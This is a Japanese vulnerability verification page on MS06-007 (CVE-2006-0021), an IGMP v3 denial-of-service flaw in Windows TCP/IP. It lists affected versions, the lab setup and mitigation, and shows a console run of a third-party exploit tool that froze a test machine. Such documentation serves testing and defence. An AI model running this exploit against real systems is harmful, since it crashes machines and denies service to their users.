MS06-007:TCP/IP の脆弱性により、サービス拒否が起こる

• 2006/04/10　検証環境にWindows Windows Server 2003 日本語版を追加
  • Author grin

• 2006/03/29　添付ファイル及び備考を追加
  • Author grin

• 2006/03/24　検証環境にWindowsXP Pro SP2 日本語版(Windowsファイアウォール無効)及び備考を追加
  • Author grin

• 2006/03/23　検証環境にWindowsXP Pro SP1 日本語版を追加
  • Author grin

• 2006/03/22　初版
  • Author grin

• IGMP v3 DoS の脆弱性に対するExploit
• サービス拒否を発生させることが可能

• Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
• icrosoft Windows Server 2003 x64 Edition

• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、および Microsoft Windows Millennium Edition (Me)

• Microsoft::Microsoft Windows のセキュリティ修正プログラム
• CVE-2006-0021

• WindowsXP Pro SPなし 日本語版
• WindowsXP Pro SP1 日本語版
• WindowsXP Pro SP2 日本語版(Windowsファイアウォール無効)
• Windows Windows Server 2003 日本語版

• 攻撃元IPアドレス: 192.168.1.47（OS Windows XP SP1）
• 攻撃先IPアドレス: 192.168.1.50（OS Windows XP SPなし）

C:\console-tool\exploit\win\DoS\ms06007>ms06007.exe

IGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)

Usage:
c:\igmps.exe <target ip> <source ip>


C:\console-tool\exploit\win\DoS\ms06007>ms06007.exe 192.168.1.50 192.168.1.47

C:\console-tool\exploit\win\DoS>

上記のように実行した直後に攻撃先のOSがフリーズ。 一切の操作ができなくなり回復不能となった。

1. MS06-007 パッチの適用 (Windows Update の実施)

SP2の場合、Windowsファイアウォールが有効になっている状態ではサービス拒否は発生しない

GUIツールも存在する